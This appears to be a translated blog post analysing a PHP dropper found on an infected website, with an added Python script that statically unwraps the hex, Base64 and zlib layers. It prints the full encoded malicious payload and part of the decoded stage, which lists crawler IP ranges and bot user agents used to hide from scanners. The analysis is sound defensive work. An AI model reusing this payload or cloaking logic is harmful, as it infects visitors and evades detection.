When you administer a web application day to day, it is important to keep every module or plugin of the application up to date. If you do not, you run the risk that your software is vulnerable to some attack and that someone installs malware that attacks your visitors, as happened in the case I am going to describe.

This case came to me some months ago. The company behind a website was worried because every time they visited their site, the antivirus warned them that someone had tried to push malicious code onto their machine (yes, friends, antivirus software is good for something). I was asked to disinfect the site and try to find out how the malware had got in.

On loading the site, you could see that the browser was fetching one PHP file too many. The only way that can happen is if that file is loaded through JavaScript, so the next step was to go through the whole page source and every JavaScript file it loaded.

What I found (though unfortunately I seem to have lost the file) was the MooTools library with a small addition. The only difference from the original library was a single line written in hexadecimal (which, merely for being written that way, already smelled strongly of guilt). Once decoded, it made the browser load the aforementioned PHP file, which is the following.

<?php
// Code 1
// PHP's eval function executes the string passed to it as PHP code.
// http://php.net/manual/es/function.eval.php
$ah_l2r = array("eNrFWW1327YO/r5fo","bo9tX3mOCKpV7vakr","Xpy9q0W5JmbZNcH8W","WHZ3IkifJc9I0//0C","FCnSttLufrqtJVEAi","QcEARBUjHhqdB5Nl+","m4jLN0FN3ERVl02rM","smyVRu9s17gzJNCpi","50ncvXsSBvt5Ht52W","kU4jUbzbBK1eq1sEa","Wjy7CIJnEOrzVrFKf","jZAnPTXp0E40FcRIX","4WUSjSRaAbQwSbLVa","JknoymKbvXa8/CGD1","pybct4HrV77WxZLpb","l6HI5nUZ5nM6ANI/m","WX47SuJ5XMIrcQ7hH","uV5lo+SDDvAfcTfC3","iZxgC8XCRZOMHXDdj","2/wu2dZh9jZMk3LX6","ptEZZ/NFWMZgo6Fxe","PzmwPD65tD4K04n2a","ow3p8YTt/sgolq66K","K2oKAvKuyXAx2d8Gy","8Hu8+xju4kW08Nofj","6NFufMuTGfLcBYNjC","jdWRY9eAz/Dsy+bZ7","n57AUredZmkZ8qQbG","8yQrIqQLnt7E27PL3","Nj9ReC8y8YhDjsfIJ","x8Gxh83Ppg+D197Dp","PHxNCnj72fbhcfEGK","aQsyIebTx7any4L2w","dHRhyN4Os55n1r+ef","/M2fEvzky4QRsfPwP","Xped9YgGB7NCKudUD","uITakqJxHCDaZ3THv","mhg4jCnaZAL4vwmca","gKMxsYzNskakxCUT9","ia2hA9RkQUaAPXEpd","IFGCUzUBgNp4I2gwl","wAN50EpjmAWdjTBWP","CjzMcBRChNCWrumLr","G8OKjBI9LFSZBbIei","0ak0H5Ko5aAhfa4Kg","lnIgf4MFeEm8XEURW","ghHBUlHqrhEz4OLEH","h8uDyURLXnSuFQ02g","8N6UC8KpM1O6AJqWu","NidWlIWv1BDbiGUxU","Azz0W71dPGcYTgBFA","HD+fLbCHL5eJxqQGW","WdKEXAn0OWrjTB1f9","KIonoAjehfgcGtupt","g+0IjO4gtCPMQ0vUY","6h1mnczJb604csagI","4/NwWCfjvM+8LbLfS","LZIoxALcK11itOohN","083maNaLbb3HtLN5w","b9yHisDWzumzD2g46","0ma0SwYuAm1KFMT3N","arHw85aXxXuNTA7Cz","zHozLmMSSIjQ5nOdI","nbbuaMKGoK3dYHqC4","zIRQHt58jVEAolDLb","CJaPIK452OQoWkpjz","TCPRwFM8rjcM05eUT","zyOIRQ7ixgMYDl3fh","0eVVAUkwGjEqHX1BC","c8wPFC5+Xl8o/6YEz","hT2ZarYFYeRU27zoa","iN2VoGHRc7us4P2qh","xpgbCI8udDoAQxqOR","FPzYFTqeJZQmWBmUg","lRRg9BT1oPFcpkCBF","IA23cJGHrFBUQ7KfJ","MkfCvEgvM9zVq/s4D","1cJshfxJILNtZ1nFQ","PHj5M4Snkv2M7hsbh","CCbBV3xpJfJmH+S28","rrJ8ssijAvf+8VWYJ","1lZIuBqtSpKLnJxW1","5lWH+AFBiHlIjLgxf","ohY3b9AYe5SoeR0ml","Rji/rFq3YTqJODeP0","gk8/4nzZcGrmWQV5h","xqFoGWrW8fiyg/7+/","PQOnzwdl5YVz8+i2u","9t//nIU7X/d3vlzc2","b17eO/jBbd2AgUCSj","s6OPxwcjDaf/HiCN5","en5z8Mfp4fHA02n91","8P4EKMfPj978cTJ6+","ebdwfv9wwOg1L9VVb","xA6+BmEYMpBsZxWPY","M6hi/LxMDXNo1THtg","mvAzXh2itHdhUe4cZ","pN4GkeTgQGUFz1jYh","wan43Xg3iAskTP5+H","4Kt
qBKqXMs2RgpNlO","UWZ51MPWGHk9Y74EY","Xn0T5jEk5DbfmPQIo","MOQBlfB2bPgMWSL9D","1jzyczcNBLQ5Iu/3i","H6zbXoPt2ib8a/MHw","VKQ8jd4wFvrdj4BM6","6gV3YV3/SxSJxOwX2","wtTvdhXuKC9PmRUyb","92yFre4wj8plnhpPw","rMn8cXw/t749Zdnv4","JzGXvxLIXJjZawkKP","wMsvLTp4t00nH/NkE","3964dbvDvSIqR/NwF","o9Hfy+zMipG+TLFwl","aOk32QVhW0OqeqafN","oAUhQ+mqseNrZ2zpO","xGkMnbn94Uxxt6e9d","8SpgottoJMH6PQBOn","uAbj1AR2PcP6g0WKB","WGNpykNPtacbYYLrf","Y3rdnmj5DVxidnvvP","75718Ah35NKaM3FBd","68mkawtRENHnIfJUX","0oGHCBFOUNA1/q0Vb","W6qu8+0f8J3aRsRt7","uGtmWmd539fOjV/NP","GGMeSHxgJDbZ+ix2O","0UH1+Ho87TyDIRyac","n/FJAimf8rjZHo+HQ","dCG+yAfQoOa1ukOeR","sWNVuUlWTagwrfpD0","B09TBopp5mgSweqpu","39avB/r7vjak2TrNe","hKv0pPwyT/qcLvPlI","tSCOVv37aoEMjodg0","y7XpqP2PWuG/q43ia","rtbmBaN4P1aZGY/8Y","qCYxBgPujUJ1K66G4","+CwJiGEDDdO5mjOQN","yNIaR0bS60yIbX/OT","PsxnlmSXYVKNsiolz","KAoeY5NwrFKe3YdHB","TiRC40yIfdaQYZvRx","f1X0hE7WqHi3pQHZQ","ESTEXnSzSLKJku8po","aJL9TiTXnMxFIJ07a","o+tWa+EGJXS1u1jW/","fDNECa8l0bSrNJAkc","4p6TnAAW/gr24MvbN","JxLFJGa7r7bZUMklS","LdoDZ71ddRPuPoPzE","D4aN+3YvK/+ArYIEo","nI/kNpkthZu5jb2lt","7gy/M2g9ergRNoEK6","dd0q8+rwxFD6MftF7","D7AZVr23mUTSN8igf","GOLbTtWtErnZubY56","+oisPjb4bWfQCEPDr","S6w+liCc4rpim6dIe","rqxj4j6ZRVk9SzpKg","gCmsUrFpHMv0HYzTq","RZVrlSNbLkms8WaEK","LsKyOW0EDwNEeVFre","kLjSo4sGqPkhV9/NU","MFvCR6BbQ+QxtS0xV","2qiJQGF3LgFX0gd2K","aikKwudJeGHhLHq3Y","WQa4tKiSwtVGSSvmQ","7WzAfJkNYKZydbYTg","GVqc2vMAI1J/uKhhG","KRf5lQrCajW7Q2usU","2FSOWNJRldb8npHYc","qyf8QVbSaksWttSzN","yGQvityNL7KZBRYTn","cIObxEZuO2P4nK39Y","2fiSIRbSFJo5cTDcI","+Yd0KdxVE1a1ouXXT","dtUTaKayk42U01LNd","W+YStHthWardBsheY","oNEehOQrNUWiOQnMU","mqPQHIXmKDRHobkKz","VVorkJzFZqr0FyF5i","o0V6G5Cs1VaJ5C8xS","ap9A8heYpNE+heQrN","U2ieQvMUmq/QfIXmK","zRfofkKzVdovkLzFZ","qvnSgUGpRXWptobaq","1mda2tLattbVi3HS1","tqe1NVyi4RINl2i4R","MMlGi7RcPVDANFwiY","ZL/Dr7e+tRRKimBtX","UoJoaVFODampoJRah","mhpUU4NqalBt+kzDZ","Rou03CZhss0XKbhap","sNYRou03CZhmtpuJa","Gq+VPYmm4loZrabiW","U5vUDvgespFLiZagi","CWLRVg5McoPynwZDa","dwwg5h7xE5zgiLKqX","Cuk
DKhIplFndagtKq","U6LMiX7Aa+nhJQi51","nZAv7su11NyiZIrCL","VmWm3+A/FGmE4eVUL","qKfpqipvjN0YasPUk","sqyE7s8CuWGyvlP/c","7/3tg2xth/5wwd2nH","w+yqdrWw6nCFNQeXh","kwR7+zXHOv/NIXl3A","UCvAsngS5zWve1cVd","lwZPOQIjh2A6SaqJ5","7J7mo5NvQ06sO+2X3","61GhiEGTExQhVkiP5","ye5qnk0kQVXnliMvP","KMv0yROr+thYBheRO","oqwQGwzJbSWag4FVM","mnzgIv/118A+kjjWa","RGOsW9rhX59nb18lX","8f01Hz7/Gj68fr06P","Tj6cnpyyL+8unzzZv","EXLw9/s198+qUfv5r","lX2ev/z65eSz+YkeJ","Z+pf/3leHb9ifz+8u","Pp6cuP5OjyzfyUHh7","/Pnl7fI1jrPDTn+70","zyBoy1CjTlAbRdY21","A2ejI4Pjk4Pjs5qJp","O1EmlgWpJJvQaurZX","D1NUOYATKAXkwI2t0","t6ZTb43hdbuTOOpIT","X2sucosyVaRML440c","cFfnB6Mnr+4cPbNwd","nYq4XuOwwAn5CHb9O","KFB5YLiKaN27AifTv","wvxLzqbRNI1+rM5fr","9VNPBcIMo31jTMaiJ","CJqywt1l1YmRmAF6m","DpuwFWhYbjV1/qd9E","Z1iVLcxCjdFAfL8uv","ZiGDUUTrzZcdubdW9","nZoO3Vxw4WK0by6vO","pmIgMX5RSw21mQxeY","DxTDKjUwDuahrjkoS","GwKF0tLTF5IGB0QyO","X1bZm4sDGzF3RV5xL","maU4RVQUo5rdbH7Wf","TgJKk3sYKq+DDCmPk","Oit+jHVNirf2zvZk0","sDCskF/HXqKY9k3mu","3maYs1HTaGUucfVvp","NqO7Hq16dxAiDnLYX","Oqv9B//zvxhdGvR8n","Nq4lI+KG1onrBnjxG","MVf7KObp2R7q7n+3A","Hv6Clj1xDwe+9NVHp","f1EojjLPNayPofV2e","NbzXtDRXLD/bW9weu","PH6RHI2ztIxSbWHlI","dSsZli7niATsamvFT","GWWRcxUKzhJrpX5vG","8IymQeEXSFvYDMbzE","EtXLvSwY9rRTZk8OU","Z9AeG6v9nEZn1C2AA","2FSZfbML8KAI88aH7","qnqdNC8CPzMKG1Z+q","fvrpv/1LgwY=");
eval("\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x69\x6D\x70\x6C\x6F\x64\x65\x28\x22\x22\x2C\x24\x61\x68\x5F\x6C\x32\x72\x29\x29\x29\x29\x3B");
?>

In general, just looking at all these strange characters, it already looks pretty bad. Analysing it at a glance, the $ah_l2r array holds a pile of strings of odd characters. I am more or less used to dealing with encodings, so I already had a fair idea that this could be Base64 encoding.

Let me remind you that encoding is not the same as encryption. Something encrypted has a method/key (a secret, in general) that makes it impossible for someone without that secret to know what was encrypted (AES encryption, for example). Encoding is simply a way of expressing something in a different form (binary or hexadecimal encoding, for example).

Furthermore, the string passed to eval is a hexadecimal-encoded string. Let's decode that string into ASCII so it becomes readable, using this web application: http://www.dolcevie.com/js/converter.html

// String to decode:
65:76:61:6C:28:67:7A:75:6E:63:6F:6D:70:72:65:73:73:28:62:61:73:65:36:34:5F:64:65:63:6F:64:65:28:69:6D:70:6C:6F:64:65:28:22:22:2C:24:61:68:5F:6C:32:72:29:29:29:29:3B

// Decoded string:
eval(gzuncompress(base64_decode(implode("",$ah_l2r))));

// implode: returns a string made of the array's elements joined together.
//          http://php.net/manual/es/function.implode.php
// base64_decode: decodes Base64-encoded data.
//          http://php.net/manual/es/function.base64-decode.php
// gzuncompress: decompresses a compressed string.
//          http://php.net/manual/es/function.gzuncompress.php

Let's start trying to understand what the decoded string does. First it calls implode on $ah_l2r to join all the array's elements into a single string. Then it decodes that whole string (which, as I said, was in Base64). The result of that operation is decompressed with gzuncompress, and finally the result is executed as PHP using eval. Therefore, the PHP code that really runs is the result of gzuncompress(base64_decode(implode("",$ah_l2r))).

An easy way to see the code that really runs is to start from the original code (Code 1), decode the eval argument that was in hexadecimal, drop the first eval and change the remaining eval to an echo, so that instead of executing the result it is printed to the screen. We also pass it through htmlentities, so that any HTML or PHP tags it contains are not interpreted and the code therefore does not run.
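The same four steps carried out statically in Python, as an added example that is not code from the original post: the hex escapes are decoded, the array named by the decoded call is imploded, Base64-decoded and zlib-decompressed (gzuncompress expects zlib format), and the result is returned as text instead of being passed to eval. Only the hex-escaped eval argument is taken from the infected file; the PHP source unwrapped at the end is constructed here with a harmless payload, and `next_layer_hints` is a helper added for this example.

```python
"""Static unwrapping of eval(gzuncompress(base64_decode(implode("", $arr)))).

Added example, not code from the original post: it repeats the author's
manual steps in Python so the sample is never executed. Only HEX_EVAL_ARG
comes from the infected file; the PHP unwrapped in __main__ is constructed.
"""
import base64
import re
import zlib

# Argument of the outer eval() exactly as it appears in the infected file.
HEX_EVAL_ARG = (
    r"\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73"
    r"\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x69\x6D"
    r"\x70\x6C\x6F\x64\x65\x28\x22\x22\x2C\x24\x61\x68\x5F\x6C\x32\x72\x29"
    r"\x29\x29\x29\x3B"
)

# Decode/execute primitives whose presence in a recovered stage means there
# is at least one more layer to peel.
LAYER_PRIMITIVES = ("eval", "base64_decode", "gzuncompress", "gzinflate",
                    "str_rot13", "create_function")


def decode_hex_escapes(s: str) -> str:
    """Resolve PHP double-quoted \\xNN escapes to the characters they encode."""
    return re.sub(r"\\x([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1), 16)), s)


def extract_string_array(php_src: str, var_name: str) -> list:
    """Return the string literals of `$var_name = array("...", "...");`.

    Whitespace inside a literal is dropped: Base64 never contains any, and a
    line break inserted when the sample was copied off a web page would
    otherwise corrupt the blob.
    """
    m = re.search(r"\$" + re.escape(var_name) + r"\s*=\s*array\((.*?)\)\s*;",
                  php_src, re.DOTALL | re.IGNORECASE)
    if not m:
        raise ValueError(f"no array assignment to ${var_name} found")
    return [re.sub(r"\s+", "", lit)
            for lit in re.findall(r'"([^"]*)"', m.group(1))]


def unwrap_loader(php_src: str) -> str:
    """Recover the PHP the loader would hand to eval(), without running it."""
    # Step 1: the outer eval("...") argument is nothing but \xNN escapes.
    m = re.search(r'eval\("((?:\\x[0-9A-Fa-f]{2})+)"\)', php_src)
    if not m:
        raise ValueError("no hex-escaped eval() call found")
    inner = decode_hex_escapes(m.group(1))
    # Step 2: the decoded call tells us which array to implode.
    if not inner.startswith("eval(gzuncompress(base64_decode(implode("):
        raise ValueError(f"unexpected decoded call: {inner}")
    arr = re.search(r'implode\(\s*""\s*,\s*\$(\w+)\s*\)', inner)
    if not arr:
        raise ValueError("implode() does not name a variable")
    blob = "".join(extract_string_array(php_src, arr.group(1)))
    # Step 3: Base64 -> zlib stream. gzuncompress() expects RFC 1950 data,
    # which is why the real blob starts with "eNr" (Base64 of the 78 DA header).
    raw = base64.b64decode(blob, validate=True)
    if raw[:1] != b"\x78":
        raise ValueError("not a zlib stream; gzuncompress() would fail too")
    # Step 4: return the stage as text (the author's echo instead of eval).
    return zlib.decompress(raw).decode("utf-8", errors="replace")


def next_layer_hints(php: str) -> list:
    """Primitives still present in a stage, i.e. reasons to keep unwrapping.

    On the loader itself this reports only 'eval': base64_decode and
    gzuncompress hide behind the \\xNN escapes, which is exactly why a naive
    grep for those names misses this kind of dropper.
    """
    return [f for f in LAYER_PRIMITIVES if re.search(r"\b" + f + r"\s*\(", php)]


def build_sample(payload: str, chunk: int = 17, var: str = "ah_l2r") -> str:
    """Constructed stand-in for Code 1: same layering, harmless payload.

    The real sample also splits its Base64 blob into 17-character pieces.
    """
    blob = base64.b64encode(zlib.compress(payload.encode())).decode()
    pieces = ",".join(f'"{blob[i:i + chunk]}"'
                      for i in range(0, len(blob), chunk))
    return f'<?php\n${var} = array({pieces});\neval("{HEX_EVAL_ARG}");\n?>'


if __name__ == "__main__":
    sample = build_sample('<?php echo "constructed harmless payload"; ?>')
    print("decoded eval argument:", decode_hex_escapes(HEX_EVAL_ARG))
    print("loader shows:", next_layer_hints(sample))
    stage2 = unwrap_loader(sample)
    print("recovered stage:", stage2, "| remaining:", next_layer_hints(stage2))
```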

<?php
$ah_l2r = array("eNrFWW1327YO/r5fo","bo9tX3mOCKpV7vakr","Xpy9q0W5JmbZNcH8W","WHZ3IkifJc9I0//0C","FCnSttLufrqtJVEAi","QcEARBUjHhqdB5Nl+","m4jLN0FN3ERVl02rM","smyVRu9s17gzJNCpi","50ncvXsSBvt5Ht52W","kU4jUbzbBK1eq1sEa","Wjy7CIJnEOrzVrFKf","jZAnPTXp0E40FcRIX","4WUSjSRaAbQwSbLVa","JknoymKbvXa8/CGD1","pybct4HrV77WxZLpb","l6HI5nUZ5nM6ANI/m","WX47SuJ5XMIrcQ7hH","uV5lo+SDDvAfcTfC3","iZxgC8XCRZOMHXDdj","2/wu2dZh9jZMk3LX6","ptEZZ/NFWMZgo6Fxe","PzmwPD65tD4K04n2a","ow3p8YTt/sgolq66K","K2oKAvKuyXAx2d8Gy","8Hu8+xju4kW08Nofj","6NFufMuTGfLcBYNjC","jdWRY9eAz/Dsy+bZ7","n57AUredZmkZ8qQbG","8yQrIqQLnt7E27PL3","Nj9ReC8y8YhDjsfIJ","x8Gxh83Ppg+D197Dp","PHxNCnj72fbhcfEGK","aQsyIebTx7any4L2w","dHRhyN4Os55n1r+ef","/M2fEvzky4QRsfPwP","Xped9YgGB7NCKudUD","uITakqJxHCDaZ3THv","mhg4jCnaZAL4vwmca","gKMxsYzNskakxCUT9","ia2hA9RkQUaAPXEpd","IFGCUzUBgNp4I2gwl","wAN50EpjmAWdjTBWP","CjzMcBRChNCWrumLr","G8OKjBI9LFSZBbIei","0ak0H5Ko5aAhfa4Kg","lnIgf4MFeEm8XEURW","ghHBUlHqrhEz4OLEH","h8uDyURLXnSuFQ02g","8N6UC8KpM1O6AJqWu","NidWlIWv1BDbiGUxU","Azz0W71dPGcYTgBFA","HD+fLbCHL5eJxqQGW","WdKEXAn0OWrjTB1f9","KIonoAjehfgcGtupt","g+0IjO4gtCPMQ0vUY","6h1mnczJb604csagI","4/NwWCfjvM+8LbLfS","LZIoxALcK11itOohN","083maNaLbb3HtLN5w","b9yHisDWzumzD2g46","0ma0SwYuAm1KFMT3N","arHw85aXxXuNTA7Cz","zHozLmMSSIjQ5nOdI","nbbuaMKGoK3dYHqC4","zIRQHt58jVEAolDLb","CJaPIK452OQoWkpjz","TCPRwFM8rjcM05eUT","zyOIRQ7ixgMYDl3fh","0eVVAUkwGjEqHX1BC","c8wPFC5+Xl8o/6YEz","hT2ZarYFYeRU27zoa","iN2VoGHRc7us4P2qh","xpgbCI8udDoAQxqOR","FPzYFTqeJZQmWBmUg","lRRg9BT1oPFcpkCBF","IA23cJGHrFBUQ7KfJ","MkfCvEgvM9zVq/s4D","1cJshfxJILNtZ1nFQ","PHj5M4Snkv2M7hsbh","CCbBV3xpJfJmH+S28","rrJ8ssijAvf+8VWYJ","1lZIuBqtSpKLnJxW1","5lWH+AFBiHlIjLgxf","ohY3b9AYe5SoeR0ml","Rji/rFq3YTqJODeP0","gk8/4nzZcGrmWQV5h","xqFoGWrW8fiyg/7+/","PQOnzwdl5YVz8+i2u","9t//nIU7X/d3vlzc2","b17eO/jBbd2AgUCSj","s6OPxwcjDaf/HiCN5","en5z8Mfp4fHA02n91","8P4EKMfPj978cTJ6+","ebdwfv9wwOg1L9VVb","xA6+BmEYMpBsZxWPY","M6hi/LxMDXNo1THtg","mvAzXh2itHdhUe4cZ","pN4GkeTgQGUFz1jYh","wan43Xg3iAskTP5+H","4Kt
qBKqXMs2RgpNlO","UWZ51MPWGHk9Y74EY","Xn0T5jEk5DbfmPQIo","MOQBlfB2bPgMWSL9D","1jzyczcNBLQ5Iu/3i","H6zbXoPt2ib8a/MHw","VKQ8jd4wFvrdj4BM6","6gV3YV3/SxSJxOwX2","wtTvdhXuKC9PmRUyb","92yFre4wj8plnhpPw","rMn8cXw/t749Zdnv4","JzGXvxLIXJjZawkKP","wMsvLTp4t00nH/NkE","3964dbvDvSIqR/NwF","o9Hfy+zMipG+TLFwl","aOk32QVhW0OqeqafN","oAUhQ+mqseNrZ2zpO","xGkMnbn94Uxxt6e9d","8SpgottoJMH6PQBOn","uAbj1AR2PcP6g0WKB","WGNpykNPtacbYYLrf","Y3rdnmj5DVxidnvvP","75718Ah35NKaM3FBd","68mkawtRENHnIfJUX","0oGHCBFOUNA1/q0Vb","W6qu8+0f8J3aRsRt7","uGtmWmd539fOjV/NP","GGMeSHxgJDbZ+ix2O","0UH1+Ho87TyDIRyac","n/FJAimf8rjZHo+HQ","dCG+yAfQoOa1ukOeR","sWNVuUlWTagwrfpD0","B09TBopp5mgSweqpu","39avB/r7vjak2TrNe","hKv0pPwyT/qcLvPlI","tSCOVv37aoEMjodg0","y7XpqP2PWuG/q43ia","rtbmBaN4P1aZGY/8Y","qCYxBgPujUJ1K66G4","+CwJiGEDDdO5mjOQN","yNIaR0bS60yIbX/OT","PsxnlmSXYVKNsiolz","KAoeY5NwrFKe3YdHB","TiRC40yIfdaQYZvRx","f1X0hE7WqHi3pQHZQ","ESTEXnSzSLKJku8po","aJL9TiTXnMxFIJ07a","o+tWa+EGJXS1u1jW/","fDNECa8l0bSrNJAkc","4p6TnAAW/gr24MvbN","JxLFJGa7r7bZUMklS","LdoDZ71ddRPuPoPzE","D4aN+3YvK/+ArYIEo","nI/kNpkthZu5jb2lt","7gy/M2g9ergRNoEK6","dd0q8+rwxFD6MftF7","D7AZVr23mUTSN8igf","GOLbTtWtErnZubY56","+oisPjb4bWfQCEPDr","S6w+liCc4rpim6dIe","rqxj4j6ZRVk9SzpKg","gCmsUrFpHMv0HYzTq","RZVrlSNbLkms8WaEK","LsKyOW0EDwNEeVFre","kLjSo4sGqPkhV9/NU","MFvCR6BbQ+QxtS0xV","2qiJQGF3LgFX0gd2K","aikKwudJeGHhLHq3Y","WQa4tKiSwtVGSSvmQ","7WzAfJkNYKZydbYTg","GVqc2vMAI1J/uKhhG","KRf5lQrCajW7Q2usU","2FSOWNJRldb8npHYc","qyf8QVbSaksWttSzN","yGQvityNL7KZBRYTn","cIObxEZuO2P4nK39Y","2fiSIRbSFJo5cTDcI","+Yd0KdxVE1a1ouXXT","dtUTaKayk42U01LNd","W+YStHthWardBsheY","oNEehOQrNUWiOQnMU","mqPQHIXmKDRHobkKz","VVorkJzFZqr0FyF5i","o0V6G5Cs1VaJ5C8xS","ap9A8heYpNE+heQrN","U2ieQvMUmq/QfIXmK","zRfofkKzVdovkLzFZ","qvnSgUGpRXWptobaq","1mda2tLattbVi3HS1","tqe1NVyi4RINl2i4R","MMlGi7RcPVDANFwiY","ZL/Dr7e+tRRKimBtX","UoJoaVFODampoJRah","mhpUU4NqalBt+kzDZ","Rou03CZhss0XKbhap","sNYRou03CZhmtpuJa","Gq+VPYmm4loZrabiW","U5vUDvgespFLiZagi","CWLRVg5McoPynwZDa","dwwg5h7xE5zgiLKqX","Cuk
DKhIplFndagtKq","U6LMiX7Aa+nhJQi51","nZAv7su11NyiZIrCL","VmWm3+A/FGmE4eVUL","qKfpqipvjN0YasPUk","sqyE7s8CuWGyvlP/c","7/3tg2xth/5wwd2nH","w+yqdrWw6nCFNQeXh","kwR7+zXHOv/NIXl3A","UCvAsngS5zWve1cVd","lwZPOQIjh2A6SaqJ5","7J7mo5NvQ06sO+2X3","61GhiEGTExQhVkiP5","ye5qnk0kQVXnliMvP","KMv0yROr+thYBheRO","oqwQGwzJbSWag4FVM","mnzgIv/118A+kjjWa","RGOsW9rhX59nb18lX","8f01Hz7/Gj68fr06P","Tj6cnpyyL+8unzzZv","EXLw9/s198+qUfv5r","lX2ev/z65eSz+YkeJ","Z+pf/3leHb9ifz+8u","Pp6cuP5OjyzfyUHh7","/Pnl7fI1jrPDTn+70","zyBoy1CjTlAbRdY21","A2ejI4Pjk4Pjs5qJp","O1EmlgWpJJvQaurZX","D1NUOYATKAXkwI2t0","t6ZTb43hdbuTOOpIT","X2sucosyVaRML440c","cFfnB6Mnr+4cPbNwd","nYq4XuOwwAn5CHb9O","KFB5YLiKaN27AifTv","wvxLzqbRNI1+rM5fr","9VNPBcIMo31jTMaiJ","CJqywt1l1YmRmAF6m","DpuwFWhYbjV1/qd9E","Z1iVLcxCjdFAfL8uv","ZiGDUUTrzZcdubdW9","nZoO3Vxw4WK0by6vO","pmIgMX5RSw21mQxeY","DxTDKjUwDuahrjkoS","GwKF0tLTF5IGB0QyO","X1bZm4sDGzF3RV5xL","maU4RVQUo5rdbH7Wf","TgJKk3sYKq+DDCmPk","Oit+jHVNirf2zvZk0","sDCskF/HXqKY9k3mu","3maYs1HTaGUucfVvp","NqO7Hq16dxAiDnLYX","Oqv9B//zvxhdGvR8n","Nq4lI+KG1onrBnjxG","MVf7KObp2R7q7n+3A","Hv6Clj1xDwe+9NVHp","f1EojjLPNayPofV2e","NbzXtDRXLD/bW9weu","PH6RHI2ztIxSbWHlI","dSsZli7niATsamvFT","GWWRcxUKzhJrpX5vG","8IymQeEXSFvYDMbzE","EtXLvSwY9rRTZk8OU","Z9AeG6v9nEZn1C2AA","2FSZfbML8KAI88aH7","qnqdNC8CPzMKG1Z+q","fvrpv/1LgwY=");
// Original string
// eval("\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x69\x6D\x70\x6C\x6F\x64\x65\x28\x22\x22\x2C\x24\x61\x68\x5F\x6C\x32\x72\x29\x29\x29\x29\x3B");
// Decoded string
// eval("eval(gzuncompress(base64_decode(implode("",$ah_l2r))))");
// Final modified string
// Watch out for the "" in the implode call: they have to be escaped.
echo htmlentities(gzuncompress(base64_decode(implode("",$ah_l2r))));
?>

The result of running this code is the following:

<?php if (!function_exists('google')) { function google($i){$a=Array("safe_mode","open_basedir","safe_mode_include_dir","safe_mode_exec_dir","disable_functions","allow_url_fopen",'max_execution_time','output_buffering','memory_limit','16M','error_log','log_errors','file_uploads','allow_url_fopen','max_execution_time','output_buffering','memory_limit','16M','error_log','log_errors','file_uploads','allow_url_fopen',"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)",'safe_mode','open_basedir',"http://","","#/#","/","","","/","/","Accept-Language: en-us, en;q=0.50\r\n","Connection: Close\r\n\r\n","\r\n\r\n","\n","<br />","","/Location\:/","Location: ","\r","\r\n\r\n","","&#76&#111&#99&#97&#116&#105&#111&#110&#58","Location:","ERROR","66\.249\.[6-9][0-9]\.[0-9]+","72\.14\.[1-2][0-9][0-9]\.[0-9]+","74\.125\.[0-9]+\.[0-9]+","65\.5[2-5]\.[0-9]+\.[0-9]+","74\.6\.[0-9]+\.[0-9]+","67\.195\.[0-9]+\.[0-9]+","72\.30\.[0-9]+\.[0-9]+","38\.[0-9]+\.[0-9]+\.[0-9]+","124\.115\.6\.[0-9]+","93\.172\.94\.227","212\.100\.250\.218","71\.165\.223\.134","209\.9\.239\.101","67\.217\.160\.[0-9]+","70\.91\.180\.25","65\.93\.62\.242","74\.193\.246\.129","213\.144\.15\.38","195\.92\.229\.2","70\.50\.189\.191","218\.28\.88\.99","165\.160\.2\.20","89\.122\.224\.230","66\.230\.175\.124","218\.18\.174\.27","65\.33\.87\.94","67\.210\.111\.241","81\.135\.175\.70","64\.69\.34\.134","89\.149\.253\.169","64\.233\.1[6-8][1-9]\.[0-9]+","64\.233\.19[0-1]\.[0-9]+","209\.185\.108\.[0-9]+","209\.185\.253\.[0-9]+","209\.85\.238\.[0-9]+","216\.239\.33\.9[6-9]","216\.239\.37\.9[8-9]","216\.239\.39\.9[8-9]","216\.239\.41\.9[6-9]","216\.239\.45\.4","216\.239\.46\.[0-9]+","216\.239\.51\.9[6-9]","216\.239\.53\.9[8-9]","216\.239\.57\.9[6-9]","216\.239\.59\.9[8-9]","216\.33\.229\.163","64\.233\.173\.[0-9]+","64\.68\.8[0-9]\.[0-9]+","64\.68\.9[0-2]\.[0-9]+","72\.14\.199\.[0-9]+","8\.6\.48\.[0-9]+","207\.211\.40\.82","67\.162\.158\.146","66\.255\.53\.123","24\.200\.208\.112","129\.187\.148\.240","129\.187\.148\.244","19
9\.126\.151\.229","118\.124\.32\.193","89\.149\.217\.191","122\.164\.27\.42","149\.5\.168\.2","150\.70\.66\.[0-9]+","194\.250\.116\.39","208\.80\.194\.[0-9]+","62\.190\.39\.205","67\.198\.80\.236","85\.85\.187\.243","95\.134\.141\.250","97\.107\.135\.[0-9]+","184\.168\.191\.[0-9]+","95\.108\.157\.[0-9]+","209\.235\.253\.17",'http','google','slurp','msnbot','bot','crawl','spider','robot','httpclient','curl','php','indy library','wordpress','charlotte','wwwster','python','urllib','perl','libwww','lynx','twiceler','rambler','yandex','trend','virus','malware','wget',"|User\.Agent\:[\s ]?|i","","^[a-zA-Z]{5,}",".","..",'langs','REMOTE_ADDR','HTTP_USER_AGENT','SCRIPT_FILENAME','','','','windows','Expires: Sat, 26 Jul 1997 05:00:00 GMT','Last-Modified: ','D, d M Y H:i:s',' GMT','Cache-Control: no-store, no-cache, must-revalidate','Cache-Control: post-check=0, pre-check=0','Pragma: no-cache','/.svn',"Hi",'0000','0001','1200','1201',"ymd","w",'ohix.','effbot.','/f/','net','ERROR',"w","a");return $a[$i];}} ?><?php 